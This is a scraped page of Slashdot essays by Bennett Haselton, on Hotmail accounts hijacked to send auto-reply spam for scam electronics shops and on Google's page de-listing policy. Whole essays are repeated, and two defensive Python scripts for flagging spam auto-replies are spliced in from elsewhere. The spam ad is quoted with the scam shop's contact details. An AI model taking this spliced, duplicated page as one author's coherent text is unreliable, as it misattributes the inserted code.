Presumably the Chinese spammers stole large numbers of passwords from Hotmail users either via a huge phishing attack, or through a security hole in Hotmail or some other part of the Windows Live service. If it was done via a security hole in Hotmail that the spammers discovered, then that would explain why the spammers' methods only worked for Hotmail accounts, and also why no other spammers have copied their techniques. (A phishing attack, on the other hand, would be easy to modify for other webmail services, and would also be easy for other spammers to emulate, so that's not consistent with the observed evidence so far.) I also found this post from blogger Stuart Shelton describing how his account was hacked by Chinese spammers -- and from the blog post, it's clear that he's very tech-savvy and would have been unlikely to fall for a run-of-the-mill password phish. If the attack happened even to people who know what they're doing, that seems to make the security hole explanation more likely.
Perhaps others can come up with some theories about what happened. It's easy to come up with guesses, but the hard part is to reconcile them with the fact that it has only affected Hotmail users so far, and no other spammer seems to have figured out how to copy the same technique yet.
But there's a much simpler question too: Why doesn't Microsoft just turn off the auto-replies for these users' accounts? They can query to see exactly which users have these messages in their auto-replies, and then un-set the auto-reply automatically. Yes, I know that even for a simple database operation like that, there's always more to it when you're managing hundreds of millions of accounts across multiple servers -- but if it will stop this one sender from sending between 50 million and 500 million spams (that in many cases will bypass people's spam filters) from Hotmail's servers in the coming year, isn't it probably worth it?
And even if it wasn't a phishing attack this time, sooner or later some other spammer will probably capture tens or hundreds of thousands of Hotmail accounts using a phish or some other method, and try spamming through auto-replies as well. So if Hotmail "fixes" this batch of auto-reply spam for practice, then the next time it happens, they'll know exactly what to do to take care of it.
I've written some columns where I strongly believed every word but expected a lot of opposition, some where I wasn't sure if I was right and just wanted to see what people thought, and . But I rarely argue something that I think is a no-brainer. Hotmail should un-set the auto-replies for those users whose accounts are spamming for nonexistent Chinese electronics knockoffs, before those accounts send another several hundred million spams in the coming year. Am I smoking crack?
Then again, maybe expectations for Hotmail shouldn't be set too high. I use SpeakEasy for my mail provider, and on about November 19th I found that all messages sent to hotmail.com addresses from SpeakEasy's servers were being bounced with an error message rejecting them for "spam-like characteristics." I called SpeakEasy and they confirmed that they knew Hotmail was blocking all mail from their users (although for "security reasons," SpeakEasy couldn't tell me what they were trying to do about it). The block wasn't lifted until about November 28th, when my messages started getting through again.
If SpeakEasy, which has been in business for 15 years, has annual revenues of $60 million, and was bought in 2007 by Best Buy, can't even get through to Microsoft in less than 10 days to tell them to stop blocking all mail from their servers, then Microsoft should first fix their postmaster trouble ticket system, so that people are not blocked from writing to their friends and family members at Hotmail for a week and a half. Then get to work on the spam auto-responders.
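The provider-side check the column asks for (find the accounts whose auto-reply carries the same advertisement, then switch it off) can be sketched as near-duplicate clustering. This is an added example, not code from the article or from Hotmail; the account names, `.example` domains, thresholds and function names are all assumptions, and the sample auto-replies are constructed.

```python
import re
from itertools import combinations

# Links and contact addresses that an auto-reply body advertises.
LINK_RE = re.compile(r"(?:https?://|www\.)[^\s<>]+|[\w.+-]+@[\w-]+(?:\.[\w-]+)+", re.I)

# Constructed sample: account -> currently configured auto-reply text.
SPAM = ("Dear friend: We are an electronic products wholesale. Our products "
        "are of high quality and low price. Please visit our website: ")
AWAY = "I am out of the office until Monday and will reply when I return."
SAMPLE_AUTOREPLIES = {
    "acct01@mail.example": SPAM + "www.shop-one.example",
    "acct02@mail.example": SPAM + "www.shop-two.example",
    "acct03@mail.example": "Dear friend: We are an electronic products wholesaler. "
                           "Our products are of high quality and low price. "
                           "Welcome to visit our website: www.shop-three.example",
    "acct04@mail.example": AWAY,
    "acct05@mail.example": AWAY,
    "acct06@mail.example": AWAY,
    "acct07@mail.example": "Thanks for your message. I check this account "
                           "rarely; please call me instead.",
}


def indicators(text):
    """Return the set of links and addresses found in one auto-reply."""
    return {m.rstrip(".,;:!?)").lower() for m in LINK_RE.findall(text)}


def shingles(text, k=2):
    """Word k-grams of the body. Every link is replaced by one token so that
    variants advertising different sites still compare as similar."""
    words = re.findall(r"[a-z0-9]+", LINK_RE.sub(" urltoken ", text).lower())
    return {tuple(words[i:i + k]) for i in range(len(words) - k + 1)}


def jaccard(a, b):
    return len(a & b) / len(a | b) if a and b else 0.0


def find_autoreply_campaigns(autoreplies, threshold=0.5, min_accounts=3):
    """Cluster accounts whose auto-replies are near-duplicates and report only
    clusters that span several accounts AND advertise a link or address.
    Pairwise comparison is fine for a sample; at provider scale the same idea
    would use MinHash/LSH instead of an O(n^2) loop."""
    accounts = sorted(autoreplies)
    sh = {a: shingles(autoreplies[a]) for a in accounts}
    parent = {a: a for a in accounts}

    def find(a):  # union-find with path halving
        while parent[a] != a:
            parent[a] = parent[parent[a]]
            a = parent[a]
        return a

    for a, b in combinations(accounts, 2):
        if jaccard(sh[a], sh[b]) >= threshold:
            parent[find(a)] = find(b)

    clusters = {}
    for a in accounts:
        clusters.setdefault(find(a), []).append(a)

    campaigns = []
    for members in clusters.values():
        links = set().union(*(indicators(autoreplies[a]) for a in members))
        # Identical out-of-office texts are common and harmless; the link
        # requirement keeps them out of the remediation list.
        if len(members) >= min_accounts and links:
            campaigns.append({"accounts": members, "links": sorted(links)})
    return campaigns


if __name__ == "__main__":
    for c in find_autoreply_campaigns(SAMPLE_AUTOREPLIES):
        print("disable auto-reply and force a password reset for:", c["accounts"])
        print("advertised:", c["links"])
```

The three identical out-of-office messages form a cluster of the same size as the spam but are not reported, because they advertise nothing; that is the false-positive case a bulk un-set operation has to avoid.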
-
Hotmailers Hawking Hoax Hunan Half-Offs
Frequent Slashdot contributor Bennett Haselton writes "An estimated 200,000 Hotmail users currently have their auto-reply set to a message spamming an advertisement for Chinese scam websites, which sell "discounted" electronics. Presumably the spammers compromised a large number of Hotmail accounts to pull this off, but wouldn't it be pretty easy for Hotmail to query for which users have that set as their auto-reply, and turn the auto-reply off for them?" Read below for Bennett's thoughts.After a recent mailing that I sent out to a subset of my proxy mailing list, I got back 18 auto-replies from Hotmail users, all substantially similar to this:
Dear friend:
We are an electronic products wholesale .Our products are of high quality and low price. If you want to do business , we can offer you the most reasonable discount to make you get more profits. We are expecting for your business.
Please visit our website: www.wedosale.com
Email: wedosale@vip.188.com .
MSN: wedosale@hotmail.com .
Looking forward to your contact and long cooperation with us!
Our mainly products such the phones, PSP, display TV, notebook, video, computers, Mp4, GPS, xbox 360, digital cameras and so on.
Welcome to visit our website!Some of the spam auto-replies advertised different websites, and the wording varied between the different auto-responses, but they were all similar advertisements for Chinese electronics "retailers." (And so, I assume, the websites are all fronts for the same company -- if multiple spammers had independently hacked Hotmail users' accounts to set their auto-replies, it would be vanishingly unlikely that those spammers would all happen to be electronics hawkers.) This was from a mailing that I sent to a set of subscribers that included about 26,000 users with "hotmail.com" e-mail addresses. If 18 out of 26,000 users in my sample have had their accounts hacked to send spam auto-replies, then this must be happening to a large number of Hotmail users -- not a large proportion (only one in 1,500, in my sample), but with about 300 million Hotmail users, that would still be a large absolute number.
The same spammers have apparently been spamming through Hotmail auto-replies for at least 11 months, according to this post in the Windows Live Help community forum from January 2009. At first, some pundits seemed to have assumed that spammers had created these accounts themselves and subscribed the accounts to people's lists, in order to spam the list owners (and, if it's a list that accepts subscriber posts, broadcast the spam to the other list readers). However, looking at the addresses in my proxy mailing list that were sending the spam auto-replies, I noticed that (1) our records show that the auto-reply-spamming subscribers joined the mailing list by various means, signing up through different Circumventor websites, not indicative of how a spammer would have joined the list by automated means, and (2) many of their email addresses are associated with legitimate-looking Myspace and Facebook accounts. Thus it looks as if these were real users who joined the list legitimately, and then got their accounts hacked by the spammers, who set those users' accounts to send the spam as an auto-response.
(If you happened to look at the spammers' www.wedosale.com website, at this point you might be thinking: I don't want to give money to spammers, but can I really get a Blackberry for only $295? Couldn't I just order from the website, and then if the goods don't show up or they're not as advertised, I can dispute the charge on my credit card? Well, I signed up for a dummy account on the www.wedosale.com page and got as far as the order page, and the only payment types that they accept are wire transfer, Western Union, and Moneygram -- precisely those types where you cannot get the money back or dispute fraudulent charges. If you've already gone and ordered a Blackberry, don't hold your breath.)
If my 26,000 users were a representative sample of the 300 million current Hotmail users, then with 1 out of 1,500 users in my sample being "infected," I could estimate that about 200,000 Hotmail users (1/1500 times 300 million) are currently set to send spam auto-replies. Hotmail claims to process 3 billion non-spam e-mails per day, for an average of about 10 non-spam e-mails per Hotmail user. That's the average for all users; what's the average for the infected users? Some factors would tend to lead to a lower average for infected users -- if they have lots of friends sending them mail, it's more likely that one of their friends would have told them about the auto-reply spam and told them to turn it off, so perhaps the users still sending the spams are the ones who don't receive a lot of messages from their friends. On the other hand, some of the infected accounts may be receiving more (non-spam) e-mail than average; one reason people sometimes abandon webmail accounts is that they're getting too much mail, even from newsletters like the Circumventor list that they had legitimately subscribed to. So, figuring that factors in both directions roughly cancel out, if each infected user is receiving the average number of 10 emails per day and sending 10 auto-reply spams in response, that's still a total of 2 million outgoing spams per day shilling for nonexistent Chinese iPhones.
These are just back-of-the-envelope calculations, but even I'm overestimating by a whole order of magnitude, that's still 0.2 million auto-reply spams per day, or about 70 million spams that will be sent by this one company through Hotmail's servers in the coming year, if Hotmail doesn't stop it. (And closer to a billion spams in the coming year if I'm not overestimating.)
And it's actually worse than that, because these spams are less likely than average to be filtered, since they're coming from Hotmail's servers. Normally you'd think that the content-based module of a spam filter would have no problem catching a message like the one at the top of this article, especially if millions of similar messages have been spewed out over the past year. However, messages from Hotmail's servers, regardless of content, are less likely to be blocked, since their network has a good reputation for sending little spam overall (due to measures such as requiring users to fill out a CAPTCHA when signing up, blocking each account from sending more than 500 messages per day, etc.). When I sent messages to the infected Hotmail users from my Gmail account, to see if the auto-responses would get through Gmail's spam filter, Gmail's blocked only half of the replies. When I mailed all the users again from my Hotmail account, the results were strange -- most of the users' accounts sent back no auto-reply at all, not even a reply that got routed to my junk folder. (Why would Hotmail accounts not send an auto-reply in response to a message from a Hotmail user? Please post if you have any idea what's going on there.) However, of the infected Hotmail accounts that did send a spam auto-reply, 100% of those auto-reply spams were delivered to my inbox. (Apparently, Hotmail's spam filter usually assumes that messages from other Hotmail users can't possibly be spam.) Only Yahoo Mail's spam filter, when I sent a test message to the infected users from my Yahoo Mail account, blocked all of the auto-replies as junk mail.
For the infected users on my mailing list, I sent them a link to a set of instructions I'd written about how to set and un-set their Hotmail auto-reply and how to change their Hotmail password, with the hopes that they'd eventually see the message and follow the steps. 18 users rescued, 200,000 to go.
So this is basically what's happening, but it still leaves some unanswered questions, such as: Why Hotmail accounts, but not Yahoo Mail, GMail, or AOL accounts? I've never noticed any auto-reply spam sent from any accounts at any of those other services. Whatever the spammers did to gain control of so many Hotmail accounts, if it was profitable for them, why didn't they do the same thing for Yahoo Mail? And, why did only one spammer do this? If they're sending between 1 and 10 million spams per day for free, they're probably making money at it. Whatever they did to hack those accounts, why wouldn't other spammers figure out the same method and copy them?
Presumably the Chinese spammers stole large numbers of passwords from Hotmail users either via a huge phishing attack, or through a security hole in Hotmail or some other part of the Windows Live service. If it was done via a security hole in Hotmail that the spammers discovered, then that would explain why the spammer's methods only worked for Hotmail accounts, and also why no other spammers have copied their techniques. (A phishing attack, on the other hand, would be easy to modify for other webmail services, and would also be easy for other spammers to emulate, so that's not consistent with the observed evidence so far.) I also found this post from blogger Stuart Shelton describing how his account was hacked by Chinese spammers -- and from the blog post, it's clear that he's very tech-savvy and would have been unlikely to fall for a run-of-the-mill password phish. If the attack happened even to people who know what they're doing, that seems to make the security hole explanation more likely.
Perhaps others can come up with some theories about what happened. It's easy to come up with guesses, but the hard part is to reconcile them with the fact that it has only affected Hotmail users so far, and no other spammer seems to have figured out how to copy the same technique yet.
But there's a much simpler question too: Why doesn't Microsoft just turn off the auto-replies for these users' accounts? They can query to see exactly which users have these messages in their auto-replies, and then un-set the auto-reply automatically. Yes, I know that even for a simple database operation like that, there's always more to it when you're managing hundreds of millions of accounts across multiple servers -- but if it will stop this one sender from sending between 50 million and 500 million spams (that in many cases will bypass people's spam filters) from Hotmail's servers in the coming year, isn't it probably worth it?
And even if it wasn't a phishing attack this time, sooner or later some other spammer will probably capture tens or hundreds of thousands of Hotmail accounts using a phish or some other method, and try spamming through auto-replies as well. So if Hotmail "fixes" this batch of auto-reply spam for practice, then the next time it happens, they'll know exactly what to do to take care of it.
I've written some columns where I strongly believed every word but expected a lot of opposition, some where I wasn't sure if I was right and just wanted to see what people thought, and . But I rarely argue something that I think is a no-brainer. Hotmail should un-set the auto-replies for those users whose accounts are spamming for nonexistent Chinese electronics knockoffs, before those accounts send another several hundred million spams in the coming year. Am I smoking crack?
Then again, maybe expectations for Hotmail shouldn't be set too high. I use SpeakEasy for my mail provider, and on about November 19th I found that all messages sent to hotmail.com addresses from SpeakEasy's servers were being bounced with an error message rejecting them for "spam-like characteristics." I called SpeakEasy and they confirmed that they knew Hotmail was blocking all mail from their users (although for "security reasons," SpeakEasy couldn't tell me what they were trying to do about it). The block wasn't lifted until about November 28th, when my messages started getting through again.
If SpeakEasy, which has been in business for 15 years, has annual revenues of $60 million, and was bought in 2007 by Best Buy, can't even get through to Microsoft in less than 10 days to tell them to stop blocking all mail from their servers, then Microsoft should first fix their postmaster trouble ticket system, so that people are not blocked from writing to their friends and family members at Hotmail for a week and a half. Then get to work on the spam auto-responders.
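The provider-side clean-up the essay asks for (find the accounts whose auto-reply carries this campaign's message, then un-set it) can be sketched as follows. This is an added example, not code from the article or from Hotmail: the account names, the variant texts and the `(account, auto_reply)` record layout are constructed, and the 0.5 threshold is an assumed starting point. Because the essay notes that the wording and the advertised sites varied, it matches on word-shingle similarity with URLs and addresses masked rather than on exact text.

```python
import re

URL_RE = re.compile(r"\b(?:https?://|www\.)\S+", re.I)
EMAIL_RE = re.compile(r"\b[\w.+-]+@[\w-]+(?:\.[\w-]+)+\b")

# Excerpt of the auto-reply quoted in the article, used as the known template.
SEED_TEMPLATE = (
    "Dear friend: We are an electronic products wholesale. Our products are "
    "of high quality and low price. If you want to do business, we can offer "
    "you the most reasonable discount to make you get more profits. "
    "Please visit our website: www.wedosale.com"
)

# Constructed sample records (hypothetical accounts and texts, not real data).
SAMPLE_AUTO_REPLIES = [
    # Same template, different advertised site.
    ("user_a@example.test",
     "Dear friend: We are an electronic products wholesale. Our products are "
     "of high quality and low price. If you want to do business, we can offer "
     "you the most reasonable discount to make you get more profits. "
     "Please visit our website: www.shop-example.test"),
    # Reworded variant with another site.
    ("user_b@example.test",
     "Dear friend: We are an electronic products wholesale. Our products are "
     "of high quality and low price. If you want to do business, we can offer "
     "you the best discount to make you get more profits. "
     "Welcome to visit our website: www.deals-example.test"),
    # Ordinary out-of-office messages.
    ("user_c@example.test",
     "I am out of the office until Monday and will reply to your message "
     "when I return."),
    ("user_d@example.test",
     "Thanks for your email. I check this account once a week, so please "
     "call me if it is urgent."),
    # Account with no auto-reply set.
    ("user_e@example.test", ""),
]


def normalize(text):
    """Mask addresses and URLs, lower-case, and split into word tokens.

    Masking keeps rotating domains and contact addresses from lowering the
    similarity between two copies of the same template.
    """
    text = EMAIL_RE.sub(" EMAILADDR ", text)
    text = URL_RE.sub(" URLTOKEN ", text)
    return re.findall(r"[a-z0-9]+", text.lower())


def shingles(text, k=3):
    """Return the set of k-word shingles of a message."""
    words = normalize(text)
    if not words:
        return set()
    if len(words) < k:
        return {tuple(words)}
    return {tuple(words[i:i + k]) for i in range(len(words) - k + 1)}


def jaccard(a, b):
    """Jaccard similarity of two shingle sets (0.0 if either is empty)."""
    if not a or not b:
        return 0.0
    return len(a & b) / len(a | b)


def find_campaign_accounts(auto_replies, seed_text, threshold=0.5):
    """Return (account, score) pairs whose auto-reply resembles the seed.

    Results are sorted by descending score so the closest matches are
    reviewed first; only accounts at or above the threshold are returned.
    """
    seed = shingles(seed_text)
    hits = []
    for account, reply in auto_replies:
        score = jaccard(seed, shingles(reply))
        if score >= threshold:
            hits.append((account, score))
    return sorted(hits, key=lambda item: (-item[1], item[0]))


if __name__ == "__main__":
    for account, score in find_campaign_accounts(SAMPLE_AUTO_REPLIES,
                                                 SEED_TEMPLATE):
        # A real clean-up would disable the auto-reply and force a password
        # reset here; this sketch only reports the candidates.
        print(f"{account}\t{score:.2f}")
```

The flagged list is a review queue: a compromised account also needs its password changed, as the instructions sent to the affected list subscribers covered.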
-
Yes, Google Does De-List Pages; But When?
Frequent Slashdot contributor Bennett Haselton writes "Google finds itself inserting a disclaimer once again above some offensive search results. But the disclaimer still leads many to believe (incorrectly) that Google doesn't tamper with search results even in cases of 'harmful' or 'offensive' material. We know that Google has in fact de-listed some pages at the request of offended parties. What is their real policy on the issue?" Read on for Bennett's essay.
In 2004, when Google users discovered that the top search result for the word "Jew" was the anti-semitic site Jew Watch, Google ran a disclaimer in the space usually reserved for ads, explaining that their results only reflected the reality of link counts on the Web, and that they did not endorse any Web sites which appeared at the top of their listings. Now the disclaimer has been dusted off again, as the top result on Google Images for "Michelle Obama" is a picture of a monkey's face with Michelle's hairdo. (Ironically, it looks as if the original image would have fallen out of the rankings, if it hadn't been for a follow-up blog post about the controversy, which itself now comes up as the first result.)
I first heard about the controversy from Dennis Prager's column in which he takes a New York Times columnist to task, because the columnist complained about "racially offensive images of the first couple" that come up in Google searches. Prager was unable to find any examples from Googling "first couple" or "Michelle and Barack Obama pictures," so he concluded that the NYT columnist "wildly exaggerated, if not made up" his claims. I tried Google Image searches for "first couple," "Barack Obama," and some other terms, and I couldn't find anything controversial either. However, it only took 10 seconds to enter "first couple google images controversy" on the regular Google Web search and find multiple blog posts explaining what all the fuss was about. Back to Google 101 for Dennis.
Many of the blog posts refer to Google's disclaimer about not tampering with search results. Those on one side are urging Google to make an exception and "fix" the results, while others sagely observe that Google just reflects reality, it doesn't create it.
All of this punditry is starting from a premise that's wrong. Google has actually removed pages from their search results — not because the pages were illegal or because the webmasters were search engine spamming, but because of the page's "offensive" content. In the "Chester's Guide" incident, a councilman in Chester, England discovered that one of the search results for "chester guide" was a satirical page titled "Chester's guide to picking up little girls." Although the page itself was obviously just someone's idea of sick humor, a Chester city councilman (who admitted that he hadn't looked at the page, saying that the title told him everything he needed to know) urged Google to remove the page from their index. Google at first refused, but later manually blacklisted the page to prevent it from appearing in their search results.
Whether or not you think this was the right decision probably depends on what you think is the purpose of Google. If Google's purpose is to return the most useful results, then it made sense to remove the link, as Danny Sullivan of Search Engine Watch argued at the time, since it almost certainly was not a useful result for people searching for "Chester Guide." On the other hand, if the primary purpose of Google is to reflect the reality of what pages on the Web feature certain words most prominently (combined with all the other factors that Google weighs, of course), then the results shouldn't be altered.
But more people should at least realize that it happened. The Google disclaimer doesn't precisely say that they never blacklist pages or modify search results ("Google reserves the right to address such requests individually"), but it seems to give most people the impression that that's the case. According to that crudest of Googling techniques for which novice searchers are so frequently lampooned, there appear to be about 400 times as many stories on the Web about the Google "Jew Watch" controversy (where Google stood their ground) as there are stories about the "Chester's Guide" incident (where Google caved).
And Google-number-three Matt Cutts posted on his blog back in March explaining why Google does not remove "offensive" pages from search results; over a hundred comments followed, debating the pros and cons of the position, but none of them mentioned the Chester incident or any other case where Google actually had removed pages except as a result of a court order. One isolated comment from "Anonymous" said:
This is not quite true. I know of at least one web site that was de-listed for containing illegal content and/or promoting illegal activity.
which may or may not have been a reference to the Chester Guide incident. And that was it.
Is this a lot of hay to be making over something that happened years ago? Well, for one thing, I doubt if it happened just once. Consider that the Chester Guide incident involved a public declaration of outrage by a city council, and a public statement from Google, and still hardly anyone knows that it ever happened. If other incidents occurred without those high-profile elements, it would be even harder to discover them now. We'll probably never know how many such incidents took place, unless someone sues Google (maybe the owner of a blacklisted website, or maybe the victim of a RipOffReport hatchet job wondering why that site hadn't been blacklisted long ago), subpoenas Google for a list of cases where pages were de-indexed, and publishes the list if it's not sealed by a court order.
But whether it was one time or a handful, consider that political candidates like Arnold Schwarzenegger and Al Franken got asked during their campaigns about things they did 20 years earlier, and it's fair to ask a candidate about their past, because it's the same person standing in front of you now. Why did you do that? Have you stopped? Why?
And in the big scheme of things, Google is probably more powerful than a single US senator or the governor of California. So, can't we ask? What are their real rules about page removal? Have those rules changed since the Chester's Guide controversy? Can they even tell us what their rules are, or do they consider it a trade secret?
It is well known, of course, that Google censors some results in their search engines branded for different markets like China and even in liberal democracies like Germany. But nobody would call that a slippery slope towards censorship in the US version of Google, because the censorship in the Chinese and German versions is done at the behest of the governments there. On the other hand, Google does admit that they will de-index pages which include credit card numbers or social security numbers (which are all too easy to find on the Web). This might not seem like a controversial position, but even this act of voluntary self-censorship may be dipping their toe in the water further than it seems. Most people do consider their credit card information more private than their home address. But surely there are people like J.D. Salinger who care less about the privacy of their credit card number (which is easily changeable) than their home address (which isn't). If someone finds Salinger's address and posts it on the Web, should Salinger be able to demand that Google de-index the page? Why should Google cater to the majority who want to keep their credit card number secret, but not to the minority who care more about keeping their address secret? Another commenter on Matt Cutts's blog post asked:
"hi. I have a question. My mom 'googled' herself and it shows some of her medical problems. She wants/needs these pages removed from search engines."
Again, why shouldn't that be considered at least as private as a credit card number?
And finally, even Google's decision to display an "offensive results" disclaimer, for some results but not for others, raises the same "Where do you draw the line?" questions as the issue of page removal. The Michelle Obama monkey picture gets a disclaimer. But search for 'george w bush' and the first row includes a photoshopped (I think!) image of Bush flipping off the press. Does that warrant a disclaimer as well? (Maybe that's considered less unfair because, even though the picture is fake, it does depict something that actually happened.) The first image result for "bristol palin" is a photo of her engaged in underage drinking — a real photo, but probably unfair to call it the single most relevant photo of her on the Web.
So while Google might consider credit cards and social security numbers and search engine spam to be on one side of a "bright line," and everything else is served up without alteration, I think the line is blurrier than that, for at least those three reasons: (a) credit cards and SSNs are less private than some other things that Google serves up anyway; (b) Google has unambiguously removed some content that fell outside that bright line, as in the Chester's guide incident, and (c) they make other "slippery slope" judgment calls about search results all the time (as in the question of when to show the disclaimer). So I hope that Google someday comes out with a more complete answer to the question. What is their real policy on what they will remove? The Chester's guide incident — would they do that sort of thing if the same situation came up today, or have their rules changed? If they want to go really deep, then is there a general set of principles from which their rules follow — explaining why, for example, they treat credit card numbers as more private than sensitive medical information? (Google did not respond to my request for comment, either through official channels or the unofficial back channels of friends who work there.)
I hope Google gives an answer some day. Even just to say, "It's a classified internal policy and that's all we're going to tell you." But once and for all, the answer is not "Google doesn't remove content just because it's 'offensive' or 'harmful.'"
Meanwhile, a modest suggestion about the disclaimer displayed above the search results: Put it where people will actually see it, in a separate line below the ads, but above the search results. Right now the link to the disclaimer is displayed as one of three ads across the top, and people don't look at the ads. But hey, people do buy ads, so if you push the disclaimer down a bit where people will read it, you also free up space for 50% more ad revenue!
-
Yes, Google Does De-List Pages; But When?
Frequent Slashdot contributor Bennett Haselton writes "Google finds itself inserting a disclaimer once again above some offensive search results. But the disclaimer still leads many to believe (incorrectly) that Google doesn't tamper with search results even in cases of 'harmful' or 'offensive' material. We know that Google has in fact de-listed some pages at the request of offended parties. What is their real policy on the issue?" Read on for Bennet's essay.In 2004, when Google users discovered that the top search result for the word "Jew" was the anti-semitic site Jew Watch, Google ran a disclaimer in the space usually reserved for ads, explaining that their results only reflected the reality of link counts on the Web, and that they did not endorse any Web sites which appeared at the top of their listings. Now the disclaimer has been dusted off again, as the top result on Google Images for "Michelle Obama" is a picture of a monkey's face with Michelle's hairdo. (Ironically, it looks as if the original image would have fallen out of the rankings, if it hadn't been for a follow-up blog post about the controversy, which itself now comes up as the first result.)
I first heard about the controversy from Dennis Prager's column in which he takes a New York Times columnist to task, because the columnist complained about "racially offensive images of the first couple" that come up in Google searches. Prager was unable to find any examples from Googling "first couple" or "Michelle and Barack Obama pictures," so he concluded that the NYT columnist "wildly exaggerated, if not made up" his claims. I tried Google Image searches for "first couple," "Barack Obama," and some other terms, and I couldn't find anything controversial either. However, it only took 10 seconds to enter "first couple google images controversy" on the regular Google Web search and find multiple blog posts explaining what all the fuss was about. Back to Google 101 for Dennis.
Many of the blog posts refer to Google's disclaimer about not tampering with search results. Those on one side are urging Google to make an exception and "fix" the results, while others sagely observe that Google just reflects reality, it doesn't create it.
All of this punditry is starting from a premise that's wrong. Google has actually removed pages from their search results — not because the pages were illegal or because the webmasters were search engine spamming, but because of the page's "offensive" content. In the "Chester's Guide" incident, a councilman in Chester, England discovered that one of the search results for "chester guide" was a satirical page titled "Chester's guide to picking up little girls." Although the page itself was obviously just someone's idea of sick humor, a Chester city councilman (who admitted that he hadn't looked at the page, saying that the title told him everything he needed to know) urged Google to remove the page from their index. Google at first refused, but later manually blacklisted the page to prevent it from appearing in their search results.
Whether or not you think this was the right decision, probably depends on what you think is the purpose of Google. If Google's purpose is to return the most useful results, then it made sense to remove the link, as Danny Sullivan of Search Engine Watch argued at the time, since it almost certainly was not a useful result for people searching for "Chester Guide." On the other hand, if the primary purpose of Google is to reflect the reality of what pages on the Web feature certain words most prominently (combined with all the other factors that Google weighs, of course), then the results shouldn't be altered.
But more people should at least realize that it happened. The Google disclaimer doesn't precisely say that they never blacklist pages or modify search results ("Google reserves the right to address such requests individually"), but it seems to give most people the impression that that's the case. According to that crudest of Googling techniques for which novice searchers are so frequently lampooned, there appear to be about 400 times as many stories on the Web about the Google "Jew Watch" controversy (where Google stood their ground) as there are stores about the "Chester's Guide" incident (where Google caved).
And Google-number-three Matt Cutts posted on his blog back in March explaining why Google does not remove "offensive" pages from search results; over a hundred comments followed, debating the pros and cons of the position, but none of them mentioned the Chester incident or any other case where Google actually had removed pages except as a result of a court order. One isolated comment from "Anonymous" said:
This is not quite true. I know of at least one web site that was de-listed for containing illegal content and/or promoting illegal activity.
which may or may not have been a reference to the Chester Guide incident. And that was it.
Is this a lot of hay to be making over something that happened years ago? Well, for one thing, I doubt if it happened just once. Consider that the Chester Guide incident involved a public declaration of outrage by a city council, and a public statement from Google, and still hardly anyone knows that it ever happened. If other incidents occurred without those high-profile elements, it would be even harder to discover them now. We'll probably never know how many such incidents took place, unless someone sues Google (maybe the owner of a blacklisted website, or maybe the victim of a RipOffReport hatchet job wondering why that site hadn't been blacklisted long ago), subpoenas Google for a list of cases where pages were de-indexed, and publishes the list if it's not sealed by a court order.
But whether it was one time or a handful, consider that political candidates like Arnold Schwarzenegger and Al Franken got asked during their campaigns about things they did 20 years earlier, and it's fair to ask a candidate about their past, because it's the same person standing in front of you now. Why did you do that? Have you stopped? Why?
And in the big scheme of things, Google is probably more powerful than a single US senator or the governor of California. So, can't we ask? What are their real rules about page removal? Have those rules changed since the Chester's Guide controversy? Can they even tell us what their rules are, or do they consider it a trade secret?
It is well known, of course, that Google censors some results in their search engines branded for different markets like China and even in liberal democracies like Germany. But nobody would call that a slippery slope towards censorship in the US version of Google, because the censorship in the Chinese and German versions is done at the behest of the governments there. On the other hand, Google does admit that they will de-index pages which include credit card numbers or social security numbers (which are all too easy to find on the Web). This might not seem like a controversial position, but even this act of voluntary self-censorship may be dipping their toe in the water further than it seems. Most people do consider their credit card information more private than their home address. But surely there are people like J.D. Salinger who care less about the privacy of their credit card number (which is easily changeable) than their home address (which isn't). If someone finds Salinger's address and posts it on the Web, should Salinger be able to demand that Google de-index the page? Why should Google cater to the majority who want to keep their credit card number secret, but not to the minority who care more about keeping their address secret? Another commenter on Matt Cutts's blog post asked:
"hi. I have a question. My mom 'googled' herself and it shows some of her medical problems. She wants/needs these pages removed from search engines."
Again, why shouldn't that be considered at least as private as a credit card number?
And finally, even Google's decision to display an "offensive results" disclaimer, for some results but not for others, raises the same "Where do you draw the line?" questions as the issue of page removal. The Michelle Obama monkey picture gets a disclaimer. But search for 'george w bush' and the first row includes a photoshopped (I think!) image of Bush flipping off the press. Does that warrant a disclaimer as well? (Maybe that's considered less unfair because, even though the picture is fake, it does depict something that actually happened.) The first image result for "bristol palin" is a photo of her engaged in underage drinking — a real photo, but probably unfair to call it the single most relevant photo of her on the Web.
So while Google might consider credit cards and social security numbers and search engine spam to be on one side of a "bright line," and everything else is served up without alteration, I think the line is blurrier than that, for at least those three reasons: (a) credit cards and SSNs are less private than some other things that Google serves up anyway; (b) Google has unambiguously removed some content that fell outside that bright line, as in the Chester's guide incident, and (c) they make other "slippery slope" judgment calls about search results all the time (as in the question of when to show the disclaimer). So I hope that Google someday comes out with a more complete answer to the question. What is their real policy on what they will remove? The Chester's guide incident — would they do that sort of thing if the same situation came up today, or have their rules changed? If they want to go really deep, then is there a general set of principles from which their rules follow — explaining why, for example, they treat credit card numbers as more private than sensitive medical information? (Google did not respond to my request for comment, either through official channels or the unofficial back channels of friends who work there.)
I hope Google gives an answer some day. Even just to say, "It's a classified internal policy and that's all we're going to tell you." But once and for all, the answer is not "Google doesn't remove content just because it's 'offensive' or 'harmful.'"
Meanwhile, a modest suggestion about the disclaimer displayed above the search results: Put it where people will actually see it, in a separate line below the ads, but above the search results. Right now the link to the disclaimer is displayed as one of three ads across the top, and people don't look at the ads. But hey, people do buy ads, so if you push the disclaimer down a bit where people will read it, you also free up space for 50% more ad revenue!
-
The Big Questions
Frequent Slashdot contributor Bennett Haselton changes things up today by reviewing The Big Questions: Tackling the Problems of Philosophy with Ideas from Mathematics, Economics and Physics. Questions that big need a big review and you can learn what Bennett has to say about it all by reading below.
The Big Questions: Tackling the Problems of Philosophy with Ideas from Mathematics, Economics and Physics
Author: Steven E. Landsburg
Pages: 288
Publisher: Free Press
Rating: 8/10
Reviewer: Bennett Haselton
ISBN: 978-1439148211
Summary: Steven Landsburg uses concepts from mathematics, economics, and physics to address the big questions in philosophy
The first thing that I have to admit as a reviewer is that I enjoyed the book so much -- not just reading it, but scribbling out pages of scratch paper working on the puzzles inspired by the book -- that I probably would have paid up to about $200 for it (despite the fact that I disagreed with many of the conclusions, and even thought some of the arguments were pretty weak). I certainly don't mean that it's better than books by Richard Dawkins, Daniel Dennett, Steven Pinker, Malcolm Gladwell, or Steven Levitt and Steven Dubner (the Freakonomics and SuperFreakonomics team), but it will appeal to many of the same people.
